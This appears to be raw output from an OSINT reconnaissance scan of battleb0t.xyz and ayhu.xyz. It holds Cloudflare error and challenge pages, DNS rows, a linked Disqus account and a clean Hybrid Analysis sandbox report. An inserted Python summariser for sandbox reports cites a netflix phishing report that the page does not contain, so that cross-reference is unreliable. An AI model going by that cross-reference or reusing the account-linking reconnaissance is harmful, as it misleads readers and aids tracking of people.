<a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=nuke.battleb0t.xyz" target="_blank" rel="noopener noreferrer">
<span class="cf-icon-cloud block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</a>
</div>
<span class="md:block w-full truncate">Newark</span>
<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
<a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=nuke.battleb0t.xyz" target="_blank" rel="noopener noreferrer">
Cloudflare
</a>
</h3>
<span class="leading-1.3 text-2xl text-green-success">Working</span>
</div>
<div id="cf-host-status" class="cf-error-source relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
<span class="cf-icon-server block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-error w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</div>
<span class="md:block w-full truncate">nuke.battleb0t.xyz</span>
<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
Host
</h3>
<span class="leading-1.3 text-2xl text-red-error">Error</span>
</div>
</div>
</div>
</div>
<div class="w-240 lg:w-full mx-auto mb-8 lg:px-8">
<div class="clearfix">
<div class="w-1/2 md:w-full float-left pr-6 md:pb-10 md:pr-0 leading-relaxed">
<h2 class="text-3xl font-normal leading-1.3 mb-4">What happened?</h2>
<p>The web server is not returning a connection. As a result, the web page is not displaying.</p>
</div>
<div class="w-1/2 md:w-full float-left leading-relaxed">
<h2 class="text-3xl font-normal leading-1.3 mb-4">What can I do?</h2>
<h3 class="text-15 font-semibold mb-2">If you are a visitor of this website:</h3>
<p class="mb-6">Please try again in a few minutes.</p>
<h3 class="text-15 font-semibold mb-2">If you are the owner of this website:</h3>
<p><span>Contact your hosting provider letting them know your web server is not responding.</span> <a rel="noopener noreferrer" href="https://support.cloudflare.com/hc/en-us/articles/200171916-Error-521">Additional troubleshooting information</a>.</p>
</div>
</div>
</div>
<div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300">
<p class="text-13">
<span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">7c5f605eb97732c7</strong></span>
<span class="cf-footer-separator sm:hidden">•</span>
<span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1">
Your IP:
<button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button>
<span class="hidden" id="cf-footer-ip">138.197.106.3</span>
<span class="cf-footer-separator sm:hidden">•</span>
</span>
<span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=nuke.battleb0t.xyz" id="brand_link" target="_blank">Cloudflare</a></span>
</p>
<script>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script>
</div><!-- /.error-footer -->
</div>
</div>
</body>
</html>
|
| 2023-05-12 03:01:27 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.9): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:57:34 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://www.bolomia.com/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.148.97.127:80"\n "34.148.97.127:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"www.bolomia.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarC089.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; 
Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: www.bolomia.com" (Indicator: "mozilla/5.0 (")\n "GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: www.bolomia.com" (Indicator: "user-agent: ")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_e28_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_e28_IESQMMUTEX_0_331"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3624"\n "IsoScope_e28_ConnHashTable<3624>_HashTable_Mutex"\n "IsoScope_e28_IESQMMUTEX_0_303"\n "IsoScope_e28_IESQMMUTEX_0_519"\n "IsoScope_e28_IE_EarlyTabStart_0xd5c_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3624"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"www.bolomia.com"'}, 
{u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "D44LOOV2.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\D44LOOV2.txt]- [targetUID: 00000000-00003624]\n Dropped file: "OLGW3LVM.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\OLGW3LVM.txt]- [targetUID: 00000000-00003624]\n Dropped file: "QN3CBW6Z.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\QN3CBW6Z.txt]- [targetUID: 00000000-00003624]'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabC088.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "urlref_httpwww.bolomia.com" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 
00000000-00003480]\n "_4C3DCED8-71A5-11ED-9C1B-08002737D871_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "D44LOOV2.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\D44LOOV2.txt]- [targetUID: 00000000-00003624]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "~DFF9EB6DC9100DFF38.TMP" has type "data"- Location: [%TEMP%\\~DFF9EB6DC9100DFF38.TMP]- [targetUID: 00000000-00003624]\n "NewErrorPageTemplate_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "OLGW3LVM.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\OLGW3LVM.txt]- [targetUID: 00000000-00003624]\n "CabC088.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabC088.tmp]- [targetUID: 00000000-00003480]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF97F6CEE582564B07.TMP" has type "data"- Location: [%TEMP%\\~DF97F6CEE582564B07.TMP]- [targetUID: 00000000-00003624]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003624]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003480]\n "QN3CBW6Z.txt" has type "ASCII text"- Location: 
[%APPDATA%\\Microsoft\\Windows\\Cookies\\QN3CBW6Z.txt]- [targetUID: 00000000-00003624]\n "~DF784A20DAD1D5BC00.TMP" has type "data"- Location: [%TEMP%\\~DF784A20DAD1D5BC00.TMP]- [targetUID: 00000000-00003624]\n "XVNE2LAN.txt" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\37NU00GP\\XVNE2LAN.txt]- [targetUID: 00000000-00003480]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: www.bolomia.com"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://www.bolomia.com/"\n Pattern match: "http://www.bolomia.com"\n Pattern match: "www.bolomia.com"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/91 Antivirus vendors marked sample as malicious (0% detection rate)'}], u'threat_level': 0, u'size': None, u'job_id': 
u'6388fef0bb265f2d7e041e56', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'suspicious_identifiers': [], u'attck_id': u'T1573', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': | 34.148.97.127 |
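Rows of type "Raw Data from RIRs" sourced from the Hybrid Analysis module, like the one above, carry a whole sandbox report as a Python repr (u'' strings, None, nested dicts) rather than JSON, so json.loads() will not read them. The summariser below is an added example, not SpiderFoot or Hybrid Analysis code: it parses that form with ast.literal_eval(), which evaluates literals only and never executes code, and reduces each report to a verdict, ATT&CK IDs, sandbox-flagged URLs and contacted endpoints. The embedded input is a constructed, trimmed copy of the two reports on this page (the bolomia.com submission above and the saranyakharidas.github.io/netflix one further down), with long description strings shortened to '...'; the score thresholds behind the verdict are an assumption of this example, not Hybrid Analysis's own scale.

```python
"""Summarise Hybrid Analysis sandbox records as SpiderFoot stores them.

Added example (not SpiderFoot or Hybrid Analysis code).  The records are a
Python repr, not JSON, so they are parsed with ast.literal_eval(), which
accepts u'' strings and None but never executes anything.
"""
import ast

# Constructed input: trimmed copies of the two reports on this page, with
# long description strings shortened to '...'.
RAW_REPORTS = (
    r"""[{u'classification_tags': [], u'crowdstrike_ai': {u'analysis_related_urls': []}, """
    r"""u'threat_score': None, u'environment_id': 100, u'submit_name': u'http://www.bolomia.com/', """
    r"""u'signatures': [{u'category': u'General', u'identifier': u'network-1', u'name': u'Contacts server', """
    r"""u'attck_id': None, u'threat_level': 0, u'description': u'"34.148.97.127:80"\n "34.148.97.127:443"'}, """
    r"""{u'category': u'General', u'identifier': u'network-0', u'name': u'Contacts domains', """
    r"""u'attck_id': None, u'threat_level': 0, u'description': u'"www.bolomia.com"'}, """
    r"""{u'category': u'General', u'identifier': u'string-127', u'name': u'Found user-agent related strings', """
    r"""u'attck_id': u'T1071.001', u'threat_level': 0, u'description': u'...'}, """
    r"""{u'category': u'Network Related', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', """
    r"""u'attck_id': u'T1573', u'threat_level': 0, u'description': u'...'}, """
    r"""{u'category': u'External Systems', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', """
    r"""u'attck_id': None, u'threat_level': 0, u'description': u'0/91 Antivirus vendors marked sample as malicious (0% detection rate)'}], """
    r"""u'threat_level': 0, u'job_id': u'6388fef0bb265f2d7e041e56', u'state': u'SUCCESS'}, """
    r"""{u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'analysis_related_urls': ["""
    r"""{u'url': u'https://saranyakharidas.github.io/netflix', u'type': u'extracted', u'verdict': u'suspicious'}]}, """
    r"""u'threat_score': 100, u'environment_id': 110, u'submit_name': u'https://saranyakharidas.github.io/netflix/', """
    r"""u'signatures': [{u'category': u'General', u'identifier': u'mutant-0', u'name': u'Creates mutants', """
    r"""u'attck_id': None, u'threat_level': 0, u'description': u'...'}]}]"""
)


def load_reports(raw: str) -> list:
    """Parse SpiderFoot's repr-encoded payload into plain Python objects."""
    data = ast.literal_eval(raw)
    return data if isinstance(data, list) else [data]


def contacted_endpoints(sigs: list) -> list:
    """Collect the quoted host:port / hostname strings from the
    'Contacts server' and 'Contacts domains' signatures."""
    out = []
    for s in sigs:
        if s.get("name") in ("Contacts server", "Contacts domains"):
            for chunk in (s.get("description") or "").split("\n"):
                chunk = chunk.strip().strip('"')
                if chunk:
                    out.append(chunk)
    return out


def summarise(report: dict) -> dict:
    """Reduce one sandbox report to the fields used for triage."""
    sigs = report.get("signatures") or []
    ai = report.get("crowdstrike_ai") or {}
    score = report.get("threat_score")
    # Hybrid Analysis leaves threat_score as None when nothing scored; keep
    # that distinct from a real 0.  The 70/30 cut-offs are this example's
    # assumption, not a documented Hybrid Analysis scale.
    if score is None:
        verdict = "no-verdict"
    elif score >= 70:
        verdict = "malicious"
    elif score >= 30:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {
        "target": report.get("submit_name"),
        "verdict": verdict,
        "score": score,
        "tags": list(report.get("classification_tags") or []),
        "attck": sorted({s["attck_id"] for s in sigs if s.get("attck_id")}),
        # Signatures above 'informative' (threat_level 0) deserve a look.
        "non_informative": [s["identifier"] for s in sigs if (s.get("threat_level") or 0) > 0],
        "ai_flagged_urls": [u["url"] for u in ai.get("analysis_related_urls", [])
                            if u.get("verdict") in ("suspicious", "malicious")],
        "contacts": contacted_endpoints(sigs),
    }


def triage(raw: str) -> list:
    """Summaries for every report in a SpiderFoot Hybrid Analysis cell."""
    return [summarise(r) for r in load_reports(raw)]


if __name__ == "__main__":
    for s in triage(RAW_REPORTS):
        print(s["target"], s["verdict"], s["tags"], s["attck"], s["contacts"])
```

On the two reports above this yields "no-verdict" for http://www.bolomia.com/ (threat_score None, 0/91 engines, every signature informative, ATT&CK T1071.001 and T1573 present only because a browser made an HTTPS request) and "malicious" with the phishing tag for the netflix page. The point of keeping None separate from 0 is that a missing score is not evidence of cleanliness.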
| 2023-05-12 03:01:23 | Web Server | No | Tool - WhatWeb | 0 | 1 | 1 | 0 | None | GitHub.com | battleb0t.xyz |
| 2023-05-12 02:53:17 | IPv6 Address | No | Mnemonic PassiveDNS | 0 | 0 | 1 | 0 | None | 2606:4700:3031::ac43:8709 | ayhu.xyz |
| 2023-05-12 02:44:28 | IP Address | No | DNS Resolver | 0 | 0 | 2 | 0 | None | 172.67.168.252 | nwapi.battleb0t.xyz |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Disqus (Category: social)
https://disqus.com/by/ayshoo/ | ayshoo |
| 2023-05-12 02:54:13 | Web Content | No | Web Spider | 2 | 0 | 3 | 0 | None | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f6036feab195d')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=kwBAgL0pzuFjxM6EaWUvVvfmBnOG2dt8365xKG72N9g-1683860053-0-gaNycGzNCfs" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="xHEPK.9yJ4uMnlaQxqQ03K5Csvr7WqmdHv5Obe9KwF8-1683860053-0-AVLFWFwz5cW9coePC-vcYYHeZXoVyZvPTnO5FSb69_py4IiBnIT69jsbDrQcjp17Zdx1pnQSJS5VK5u2qIZwYpKNdgBE5WortG78wVuw6xpL5WYKY8Pci1GRr-7IBheF2wnVhBXoAAbVv_kvF_G81MlD02OBybPgpztHUD8TsNxjUjxn5wbC4eO6XMoHSPC4tPjeAbdNC_mEhVDvKltWOjEKs7cQGG73dOqgzgZ5u0yyPTVVyh672vGUJchUE-7DlMtIc30cGk9vDedhhqnCEm6pQHqEqKn7E1c0_xe56xpqCOyx0gVIxxZL8ZolJaAY4W4DtMmEP6W2tHpS_rYvBDI9fm43yWOoTbxEvpOBUd21ETXlvv9NENQqsCUvjbm4kjTEkCkt9i7ao6sYMKBDIKOrBrqKSvX_CT_w9eydgmcnRxeGAnGPZ1UUlMCuPuHg11UNYHIqPBTtKLbqJ0CVo0se3b48fGi-sK8cLCpgZLWb2fRokqIeBAyscADBAfixig610ec8NyTnlho4fWsEuVJ8IH0YuFSDI5qB-p_hHDFAgQ4e2o5glLWVxkylixix8LPq3AjtUqJZW7z32u6RcNlBfPCJCrP_P-wzAtCmBv9wwLgJM8s28Fc0U3NqhEI7UzCd5r2rd1L9dZdXgwaESjOHBhuzibRb747KWauMhNoTHcDBBW-Cplvyyky4fhJh4codwoIMSFuB2e8vqSriOeMyuMhff86CdrTUwmJ-MpOwS5b3SzLp4WsUmqgXo5R_Ptn_13EQTYvgg_fn9wQYMVvNul0EzUw-m0dzAaXiayW9ZQRIKrGrxHaH77vlgDYfon_mV1EHNo0mYKenjF4lATYUDXOdsHJGDEb-aoyHMedXT2xjfifF75YrCt7aKEBajKaabeBOm93QKGtGLkUbhjuxR1Cv3fMl-a8Mcq-sqIzDY7Ofms_NojFVCky1MxilEB-pECoh_3dTQi7RdzrUTwf2cZR9T8D8U2K3Gvk8riLAICiz8kZstCExyU1gQxK_8IKsvToQ9RDrd9y9LVAX9qYv3TfadD1EkNEsFVChUuXBIn1vLV2P2GOPSzKbMN6zXhMlaXjRniTwtw6d8mrDXwAGH5ieemrcUb3FjxXespiPiaHaem6NlgnFXh6fqC6miAGPTygfZ8E84F8EVSFKovIkpjZZLkzg9smKqoObMwmWAc8hXyTmDTP1LoHTnasWw3kR_c4rubMdm-bM_qzcdotudBYUrTeL52K6MUKh8U0LXxV1ssRlYQtn51j2ZPTCT_4njX0UJZi7Aqe8bZOIi6YaJ6JVsLLVQlGwMIkxweehKTweGkzepoKrlA3vvzsnIuw6hwdTbMC1ff1nqZDuEXn1iUtY0QVWk3AiHWDwvflyRUhJFVQ_1RWCY6QxNbtBWuOs4Gsp4MKA65Y2bcGJNUQ61JSZsl8YoM493x6bgQq2c1ARXqI8Z_BprKNhAkkBaHzNAZnBx2sKG-aiygeREJS_Y-EXoEZkRsbQX02jydwcJZ3mjFQKdYrYE5cpUbTynwFh1r8orCm-Lgkh_khmNL7q7VDaHkkpQxyvlai7E7fXqkM8fGYOO32gd0hDiIlm85y2e8PdcZwTHglcg5WuEl3dz67kdyLqQrK_w0NhcEVoQlt-w-zjK_ug7gJVFCqVZy6o3CJv3Lkws4Pg2ePLly9U4qZNVRt3zz5hcKoCs-Pa1ZZzJ_Qzb2gSMP3u4cNDexag1H59HlUfcR7rjMJpsPYzqNpSQW3aa4RjeYciW4G4IbxfKJhCeUuFM4E4frBI_2OUYka-3R16-e5B-3ARb0HzAH7oGbA0ldmTnvfk1irgRMe8Dly0jpz5UNRE52UktWtSquB5QC1854VbxxgX4hhaW-nxmTCdOLafGYF1vg8rF-8NC
1_FbTKMqIVsNKBWX0k0kJqiJjLCwjxEgXQ0Ze8manGpGGX8Y1qPfnNzHc2wFXLAoenNI_c9mp5k_TulxRQaJau67nLCYZqdFCfQ3OMpvtX4xDex5PrZ9T6mJUZ1nmSTAUixBLPwpRedqy1s01H2wlDBkSOhsj3ve3tA6H7ilQqtLQdfAuHK0_eW1Lnq3yDEyuzONZ1kc6hBMbhcyIePtyej1WeNa25rCw6imHPfgLzKSCX7sag3MiyXZyiVPtZsVrR333h3qptvAltAf6opML25pqpe_uKUHyc688RAlp_EgHCq-Gbx-iN5q2hY5Ny4xRPFJdCIjbFhNtGVw4MmWaJvAiePWPHqtweVVadLDMPlJCf3alqy71aqsxQI2WCWYRD_4Slgey6lOkSSsS-VG0B1_pBFsI7Qoqg4mLVGYQxVgLA66wEWyPhSdzuYryBNRXVwsWkB269be5JcqZIZNgC1b12-boaqHNSrCKMj83nOOm100RSF9-42ajHgNdPc9977LoOsIdA4wiwXyaum_ok5aRH8NPa5DUgCLteaEnABaI691YwS3Yv94Jp3MSd41yoh45wgGe42SPtQxw">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '8897',
cRay: '7c5f6036feab195d',
cHash: '461a186bf737deb',
cUPMDTk: "\/?__cf_chl_tk=kwBAgL0pzuFjxM6EaWUvVvfmBnOG2dt8365xKG72N9g-1683860053-0-gaNycGzNCfs",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei8=',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: '2ToLICUBPb7XpOOLU5MHBc4J5yG0oheUGtehN/w3ZVsFmzDAbOvCroJJwwrRkjNV6Tn52KN/9nB7B8sz2NSv9/9dxRAmoEg1HGzmozU2NACMuujm6XlVF5ozcbqn9ZBfwSat/mPFIuXurAISwgnINkk9AtugcpCUQHziQl+hs46Tkaidb6rhmNGYloX58NMp6/dt44yfsmywuLVXcAFkah1saaFWiETNA22oPOLsKwdZLjZF/57cZ6U7IE+U9u08hSy2LwMl1S56XHXIPlPdXyU5wEzETE40l9LPy3liHtZ+0sFpGwOEjIvxrQ5T+yTbOd6FLXQq2biCWHdXzGq4q/Z6wpMSuxwTK5+LQiEDYzatOhFmeim8d5on6i6XRRqVjrZwVw7DnLXOPTyWGBSUGsicd01O/2CEnxT4kImRgcQduMx6bhGCiOWw7czbee4tF0zlsS59dzRB//Ht7dvKhDA88UnMm0xLzbHkJ9p9hx93IVifAjtUzWhW/2Y09mfOKl8wDJzjQdRxKsjlPBcyuT+2r0jZJkNDjSBjms0IuC9kDZ1UDHsrKoZzpFM/Of20',
t: 'MTY4Mzg2MDA1My41OTUwMDA=',
m: '5/J7gGK8XmEBWkArTjJaJQpVmCj5kenNaxHbI91xZvc=',
i1: 'd1xtl4gFAsGt/e5zgSdIvg==',
i2: 'L38k4kp9xxsqGxDFehGWAg==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f6036feab195d');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f6036feab195d';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=kwBAgL0pzuFjxM6EaWUvVvfmBnOG2dt8365xKG72N9g-1683860053-0-gaNycGzNCfs" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
| https://ayhu.xyz/?__cf_chl_f_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU |
